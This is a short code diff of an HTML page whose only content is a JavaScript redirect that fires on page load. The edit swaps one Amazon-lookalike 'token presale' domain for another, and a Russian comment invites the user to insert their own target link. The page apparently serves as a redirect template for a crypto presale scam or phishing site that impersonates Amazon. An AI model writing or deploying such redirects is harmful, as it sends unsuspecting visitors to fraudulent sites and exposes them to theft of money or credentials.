--- a/index.html
+++ b/index.html
@@ -14,7 +14,7 @@
   <!-- Редирект через JavaScript -->
   <script>
     window.onload = function() {
-      window.location.href = "https://amzn-token.com/"; // Замени на свою целевую ссылку
+      window.location.href = "https://presale-amazon.com/"; // Замени на свою целевую ссылку
     }
   </script>
 </head>
